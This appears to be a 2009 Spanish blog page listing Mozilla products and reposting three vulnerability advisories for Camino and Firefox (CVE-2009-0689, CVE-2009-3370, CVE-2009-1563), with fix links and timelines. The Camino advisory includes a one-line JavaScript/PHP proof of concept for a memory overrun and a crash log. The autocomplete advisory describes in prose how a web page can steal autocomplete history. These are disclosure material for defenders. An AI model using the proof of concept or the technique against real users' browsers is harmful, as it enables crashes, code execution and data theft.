December 21st, 2009 — browser, camino, firefox, free software
Como seguramente escucharon, Mozilla Firefox 3.5 es el browser más popular del mundo. Si no lo tienes aún, bajalo aquí. Si ya usas Mozilla Firefox, recuerda que la Fundación Mozilla tambien tiene otros productos:
- Thunderbird. Un lector de correo de gran calidad, equivalente en funcionalidad a Outlook, pero de código abierto. En general muy útil, con actualizaciones seguidas tanto de funcionalidad como de seguridad. Bajalo aquí.
- Seamonkey. ¿Eras usuario de Netscape Navigator? ¿Recuerdas que tenía integrado un lector de correo, un navegador y un chat? Bueno, Seamonkey reimplementa este paquete en Seamonkey. Bajalo aquí.
- Bugzilla. Si necesitas hacer seguimiento de tickets/bugs, puedes usar bugzilla, un sistema clásico para ayudarte en todo el proceso de calidad de software (o cualquier producto similar). Bajalo aquí.
- Camino. El famoso navegador de Mozilla basado en Gecko, pero con el look-n-feel de Mac. Muy rápido y agrable. Bajalo aquí.
Aunado a estos productos, hay miles de extensiones y add-ons para firefox, gratis!
December 11th, 2009 — apple, browser, camino, free software, mozilla foundation, seguridad
cxib@securityreason.com
to bugtraq |
|
show details 5:33 PM (19 hours ago)
|
|
—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA1
[ Camino 1.6.10 Remote Array Overrun (Arbitrary code execution) ]
Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- – Dis.: 07.05.2009
- – Pub.: 11.12.2009
CVE: CVE-2009-0689
CWE: CWE-119
Risk: High
Remote: Yes
Affected Software:
- – Camino 1.6.10
Fixed in:
- – Camino 2.0 <=
NOTE: Prior versions may also be affected.
Original URL:
http://securityreason.com/achievement_securityalert/76
- — 0.Description —
Camino (from the Spanish word camino meaning “way”, “path” or “road”) is a free, open source, GUI-based Web browser based on Mozilla’s Gecko layout engine and specifically designed for the Mac OS X operating system. In place of an XUL-based user interface used by most Mozilla-based applications, Camino uses Mac-native Cocoa APIs, although it does not use native text boxes.
- — 1. Camino 1.6.10 Remote Array Overrun (Arbitrary code execution) —
The main problem exist in dtoa implementation. Camino has the same dtoa as Firefox, SeaMonkey, Chrome, Opera etc.
and it is the same like SREASONRES:20090625.
http://securityreason.com/achievement_securityalert/63
but fix for SREASONRES:20090625, used by openbsd was not good.
More information about fix for openbsd and similars SREASONRES:20091030,
http://securityreason.com/achievement_securityalert/69
We can create any number of float, which will overwrite the memory. In
Kmax has defined 15. Functions in dtoa, don’t checks Kmax limit, and
it is possible to call 16<= elements of freelist array.
- — 2. Proof of Concept (PoC) —
- ———————–
<script>
var a=0.<?php echo str_repeat(”1″,296450); ?>;
</script>
- ———————–
Process: Camino [153]
Path: /Volumes/Camino/Camino.app/
Contents/MacOS/Camino
Identifier: org.mozilla.camino
Version: 1.6.10 (1609.09.25)
Code Type: X86 (Native)
Parent Process: launchd [92]
Date/Time: 2009-11-06 12:57:24.698 -0800
OS Version: Mac OS X 10.5.6 (9G55)
Report Version: 6
Exception Type: EXC_BAD_ACCESS (SIGSEGV)
Exception Codes: KERN_INVALID_ADDRESS at 0×000000007e33d590
Crashed Thread: 0
Thread 0 Crashed:
0 libSystem.B.dylib 0×01d7e325 tiny_malloc_from_free_list + 235
1 libSystem.B.dylib 0×01d7710d szone_malloc + 180
2 libSystem.B.dylib 0×01d77018 malloc_zone_malloc + 81
3 libSystem.B.dylib 0×01d76fac malloc + 55
4 libxpcom_core.dylib 0×00c5271d PL_DHashTableInit + 220
5 org.mozilla.camino 0×00389bac RuleHash::RuleHash(int) + 282
6 org.mozilla.camino 0×0038ae0e nsCSSRuleProcessor::GetRuleCascade(nsPresContext*) + 146
7 org.mozilla.camino 0×0038b215 nsCSSRuleProcessor::RulesMatching(PseudoRuleProcessorData*) + 27
8 org.mozilla.camino 0×003afbd0 EnumPseudoRulesMatching(nsIStyleRuleProcessor*, void*) + 24
9 org.mozilla.camino 0×003b0885 nsStyleSet::FileRules(int (*)(nsIStyleRuleProcessor*, void*), RuleProcessorData*) + 37
10 org.mozilla.camino 0×003b0c77 nsStyleSet::ResolvePseudoStyleFor(nsIContent*, nsIAtom*, nsStyleContext*, nsICSSPseudoComparator*) + 123
11 org.mozilla.camino 0×002cc924 nsCSSFrameConstructor::ConstructRootFrame(nsIContent*, nsIFrame**) + 134
12 org.mozilla.camino 0×002f617b PresShell::InitialReflow(int, int) + 1151
13 org.mozilla.camino 0×005a90d4 nsContentSink::StartLayout(int) + 342
14 org.mozilla.camino 0×00483354 HTMLContentSink::StartLayout() + 82
15 org.mozilla.camino 0×00486cb7 HTMLContentSink::OpenBody(nsIParserNode const&) + 193
16 org.mozilla.camino 0×001a60e8 CNavDTD::OpenBody(nsCParserNode const*) + 54
17 org.mozilla.camino 0×001a8b53 CNavDTD::HandleDefaultStartToken(CToken*, nsHTMLTag, nsCParserNode*) + 393
18 org.mozilla.camino 0×001aa3e5 CNavDTD::HandleStartToken(CToken*) + 623
19 org.mozilla.camino 0×001aaaa2 CNavDTD::HandleToken(CToken*, nsIParser*) + 1358
20 org.mozilla.camino 0×001a9a4d CNavDTD::BuildModel(nsIParser*, nsITokenizer*, nsITokenObserver*, nsIContentSink*) + 165
21 org.mozilla.camino 0×001a94ee CNavDTD::DidBuildModel(unsigned int, int, nsIParser*, nsIContentSink*) + 550
22 org.mozilla.camino 0×001b5e28 nsParser::DidBuildModel(unsigned int) + 90
23 org.mozilla.camino 0×001b83c7 nsParser::ResumeParse(int, int, int) + 661
24 org.mozilla.camino 0×001b59a8 nsParser::OnStopRequest(nsIRequest*, nsISupports*, unsigned int) + 128
25 org.mozilla.camino 0×002076a0 nsDocumentOpenInfo::OnStopRequest(nsIRequest*, nsISupports*, unsigned int) + 88
26 org.mozilla.camino 0×000f522a nsFileChannel::OnStopRequest(nsIRequest*, nsISupports*, unsigned int) + 78
27 org.mozilla.camino 0×000baf18 nsInputStreamPump::OnStateStop() + 88
28 org.mozilla.camino 0×000bb49d nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) + 133
29 libxpcom_core.dylib 0×00cb7d4d nsAStreamCopier::Process() + 751
30 libxpcom_core.dylib 0×00c8f251 PL_HandleEvent + 21
31 libxpcom_core.dylib 0×00c8f50a PL_ProcessPendingEvents + 103
32 com.apple.CoreFoundation 0×014455f5 CFRunLoopRunSpecific + 3141
33 com.apple.CoreFoundation 0×01445cd8 CFRunLoopRunInMode + 88
34 com.apple.HIToolbox 0×02d8b2c0 RunCurrentEventLoopInMode + 283
35 com.apple.HIToolbox 0×02d8b0d9 ReceiveNextEventCommon + 374
36 com.apple.HIToolbox 0×02d8af4d BlockUntilNextEventMatchingListInMode + 106
37 com.apple.AppKit 0×05e94d7d _DPSNextEvent + 657
38 com.apple.AppKit 0×05e94630 -[NSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] + 128
39 com.apple.AppKit 0×05e8d66b -[NSApplication run] + 795
40 com.apple.AppKit 0×05e5a8a4 NSApplicationMain + 574
41 org.mozilla.camino 0×0000364c main + 196
42 org.mozilla.camino 0×00002f1e _start + 216
43 org.mozilla.camino 0×00002e45 start + 41
Thread 1:
0 libSystem.B.dylib 0×01dad30a select$DARWIN_EXTSN$NOCANCEL + 10
1 libnspr4.dylib 0×00d3940e poll + 258
2 libnspr4.dylib 0×00d35cc6 PR_Poll + 134
3 org.mozilla.camino 0×000cb897 nsSocketTransportService::Poll(unsigned int*) + 99
4 org.mozilla.camino 0×000cbe75 nsSocketTransportService::Run() + 497
5 libxpcom_core.dylib 0×00c91baf nsThread::Main(void*) + 41
6 libnspr4.dylib 0×00d37309 _pt_root + 150
7 libSystem.B.dylib 0×01da7095 _pthread_start + 321
8 libSystem.B.dylib 0×01da6f52 thread_start + 34
Thread 2:
0 libSystem.B.dylib 0×01d76226 semaphore_timedwait_signal_trap + 10
1 libSystem.B.dylib 0×01da81ef _pthread_cond_wait + 1244
2 libSystem.B.dylib 0×01df2aaf pthread_cond_timedwait + 47
3 libnspr4.dylib 0×00d32970 pt_TimedWait + 207
4 libnspr4.dylib 0×00d32cc7 PR_WaitCondVar + 75
5 libxpcom_core.dylib 0×00c93be2 TimerThread::Run() + 74
6 libxpcom_core.dylib 0×00c91baf nsThread::Main(void*) + 41
7 libnspr4.dylib 0×00d37309 _pt_root + 150
8 libSystem.B.dylib 0×01da7095 _pthread_start + 321
9 libSystem.B.dylib 0×01da6f52 thread_start + 34
Thread 3:
0 libSystem.B.dylib 0×01d76226 semaphore_timedwait_signal_trap + 10
1 libSystem.B.dylib 0×01da81ef _pthread_cond_wait + 1244
2 libSystem.B.dylib 0×01df2aaf pthread_cond_timedwait + 47
3 libnspr4.dylib 0×00d32970 pt_TimedWait + 207
4 libnspr4.dylib 0×00d32cc7 PR_WaitCondVar + 75
5 org.mozilla.camino 0×000b539d nsIOThreadPool::ThreadFunc(void*) + 145
6 libnspr4.dylib 0×00d37309 _pt_root + 150
7 libSystem.B.dylib 0×01da7095 _pthread_start + 321
8 libSystem.B.dylib 0×01da6f52 thread_start + 34
Thread 4:
0 libSystem.B.dylib 0×01d7d3ae __semwait_signal + 10
1 libSystem.B.dylib 0×01da7d0d pthread_cond_wait$UNIX2003 + 73
2 com.apple.QuartzCore 0×052c6ab9 fe_fragment_thread + 54
3 libSystem.B.dylib 0×01da7095 _pthread_start + 321
4 libSystem.B.dylib 0×01da6f52 thread_start + 34
Thread 5:
0 libSystem.B.dylib 0×01d76226 semaphore_timedwait_signal_trap + 10
1 libSystem.B.dylib 0×01da81ef _pthread_cond_wait + 1244
2 libSystem.B.dylib 0×01df2aaf pthread_cond_timedwait + 47
3 libnspr4.dylib 0×00d32970 pt_TimedWait + 207
4 libnspr4.dylib 0×00d32cc7 PR_WaitCondVar + 75
5 org.mozilla.camino 0×000d43ce nsHostResolver::GetHostToLookup(nsHostRecord**) + 212
6 org.mozilla.camino 0×000d4b2d nsHostResolver::ThreadFunc(void*) + 123
7 libnspr4.dylib 0×00d37309 _pt_root + 150
8 libSystem.B.dylib 0×01da7095 _pthread_start + 321
9 libSystem.B.dylib 0×01da6f52 thread_start + 34
Thread 6:
0 libSystem.B.dylib 0×01dc56f2 select$DARWIN_EXTSN + 10
1 libSystem.B.dylib 0×01da7095 _pthread_start + 321
2 libSystem.B.dylib 0×01da6f52 thread_start + 34
Thread 7:
0 libSystem.B.dylib 0×01d76226 semaphore_timedwait_signal_trap + 10
1 libSystem.B.dylib 0×01da81ef _pthread_cond_wait + 1244
2 libSystem.B.dylib 0×01df2aaf pthread_cond_timedwait + 47
3 libnspr4.dylib 0×00d32970 pt_TimedWait + 207
4 libnspr4.dylib 0×00d32cc7 PR_WaitCondVar + 75
5 org.mozilla.camino 0×000b539d nsIOThreadPool::ThreadFunc(void*) + 145
6 libnspr4.dylib 0×00d37309 _pt_root + 150
7 libSystem.B.dylib 0×01da7095 _pthread_start + 321
8 libSystem.B.dylib 0×01da6f52 thread_start + 34
Thread 0 crashed with X86 Thread State (32-bit):
eax: 0xf8051a22 ebx: 0×01d7e255 ecx: 0×07e8fca0 edx: 0×7e33d590
edi: 0×07d5c000 esi: 0×07e00000 ebp: 0xbfffe208 esp: 0xbfffe190
ss: 0×0000001f efl: 0×00010206 eip: 0×01d7e325 cs: 0×00000017
ds: 0×0000001f es: 0×0000001f fs: 0×00000000 gs: 0×00000037
cr2: 0×7e33d590
- — 3. SecurityReason Note —
Officialy SREASONRES:20090625 has been detected in:
- – OpenBSD
- – NetBSD
- – FreeBSD
- – MacOSX
- – Google Chrome
- – Mozilla Firefox
- – Mozilla Seamonkey
- – Mozilla Thunderbird
- – Mozilla Sunbird
- – Mozilla Camino
- – KDE (example: konqueror)
- – Opera
- – K-Meleon
- – F-Lock
This list is not yet closed.
- — 4. Fix —
NetBSD fix (optimal):
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h
OpenBSD fix:
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c
- — 5. Credits —
Discovered by sp3x and Maksymilian Arciemowicz from SecurityReason.com.
- — 6. Greets —
Infospec p_e_a pi3
- — 7. Contact —
Email:
- – cxib {a.t] securityreason [d0t} com
- - sp3x {a.t] securityreason [d0t} com
GPG:
- – http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
- – http://securityreason.com/key/sp3x.gpg
http://securityreason.com/
http://securityreason.pl/
—–BEGIN PGP SIGNATURE—–
iEYEARECAAYFAkshevAACgkQpiCeOKaYa9aj5gCcDrfDkGIjDV2Fo+J402jTE7u3
rwYAni4FngpFFwhcsuoZjNGeeh68lJQ+
=eZDR
—–END PGP SIGNATURE—–
November 4th, 2009 — Uncategorized, linux
===============================ADVISORY===============================
Name: Autocomplete Data Theft in Mozilla Firefox
Systems Affected: Mozilla Firefox 3.5, Mozilla Firefox 3.0
Severity: Moderate
Category: Data Leakage
Author: Context Information Security Ltd
Advisory: 4 November 2009
CVE: CVE-2009-3370
===============================ADVISORY===============================
Description:
————
A malicious web page can extract out all the data stored within the autocomplete history of a user’s Firefox browser. The web page must convince a user to hold down the left or right-arrow keys then the contents of the autocomplete popup can be read. This may includes the search history box within the browser, or other personal details.
Analysis
——–
A malicious web page can be created that includes a text field with the same ‘name’ attribute as data entered on other sites (e.g ‘q’ for Google). The form autocompletion popup in Firefox can then be triggered and manipulated by a variety of key presses. For example, by pressing the ‘a’ key, autocomplete entries starting with that letter will be shown. Entries in the poupup can be selected by using the up/ down arrow keys. When the left or right arrow key is pressed, the currently selected entry from the popup is entered into the text field and can be read through JavaScript.
In Firefox, a web page can use the ‘createEvent’ and ‘initKeyEvent’ JavaScript methods to create synthetic key events. It was discovered that these events could be used to trigger an autocomplete popup and change the currently selected entry in the popup.
However, it was not possible for synthetic events to cause the text field to be filled with the current entry. Therefore some user interaction is required to enable the web page to steal the contents of the drop-down. If a web page can convince a user to hold down or repeatedly press the left or right-arrow keys, it can systematically grab each entry in the drop-down box.
Technologies Affected
———————
Mozilla Firefox 3.5.3 and below
Mozilla Firefox 3.0.0.14 and below
Resolution
———-
Mozilla fixed this issue in the 3.5.4 and 3.0.0.15 releases of Firefox:
http://www.mozilla.org/security/announce/2009/mfsa2009-52.html
CVE
—
This issue has been assigned CVE number CVE-2009-3370.
Disclosure Timeline
——————-
8th August 2009 – Initial Discovery and Vendor Notification 8th August 2009 – Vendor Response
27 October 2009 – Vendor Advisory Release
4 November 2009 – Context Information Security Advisory Release
Credits
——-
Paul Stone of Context Information Security Ltd
About Context Information Security
———————————-
Context Information Security Limited is a specialist information security consultancy based in London and Dusseldorf.
Context promotes the holistic approach to information security and helps clients to identify, assess and control their exposure to risk within the fields of IT, telephony and physical security. Context employs experienced information security professionals who are subject-matter experts in their various technical specialisms. Context works extensively within the finance, legal, defence and government sectors, delivering high-end information security projects to organisations for which security is a priority.
Web: www.contextis.co.uk
Email: disclosure@contextis.co.uk
October 28th, 2009 — Uncategorized, linux
======================================================================
Secunia Research 28/10/2009
– Mozilla Firefox Floating Point Memory Allocation Vulnerability -
======================================================================
Table of Contents
Affected Software…………………………………………….1
Severity…………………………………………………….2
Vendor’s Description of Software……………………………….3
Description of Vulnerability…………………………………..4
Solution…………………………………………………….5
Time Table…………………………………………………..6
Credits……………………………………………………..7
References…………………………………………………..8
About Secunia………………………………………………..9
Verification………………………………………………..10
======================================================================
1) Affected Software
* Mozilla Firefox 3.0.14 and 3.5.3.
NOTE: Prior versions may also be affected.
======================================================================
2) Severity
Rating: Highly critical
Impact: System access
Where: Remote
======================================================================
3) Vendor’s Description of Software
“The award-winning Firefox Web browser has security, speed and new
features that will change the way you use the Web. Don’t settle for
anything less.”
Product Link:
http://www.mozilla.com/firefox/
======================================================================
4) Description of Vulnerability
Secunia Research has discovered a vulnerability in Mozilla Firefox,
which can be exploited by malicious people to compromise a user’s
system.
The vulnerability is caused due to an array indexing error while
allocating space for floating point numbers. This can be exploited to
trigger a memory corruption when a specially crafted floating point
number is processed.
Successful exploitation allows execution of arbitrary code.
======================================================================
5) Solution
Update to version 3.0.15 or 3.5.4.
======================================================================
6) Time Table
14/09/2009 – Vendor notified.
14/09/2009 – Vendor response.
28/10/2009 – Public disclosure.
======================================================================
7) Credits
Discovered by Alin Rad Pop, Secunia Research.
======================================================================
References
The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2009-1563 for the vulnerability.
======================================================================
9) About Secunia
Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:
http://secunia.com/advisories/business_solutions/
Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.
http://secunia.com/advisories/
Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:
http://secunia.com/secunia_research/
Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:
http://secunia.com/corporate/jobs/
Secunia offers a FREE mailing list called Secunia Security Advisories:
http://secunia.com/advisories/mailing_lists/
======================================================================
10) Verification
Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2009-35/
Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/
======================================================================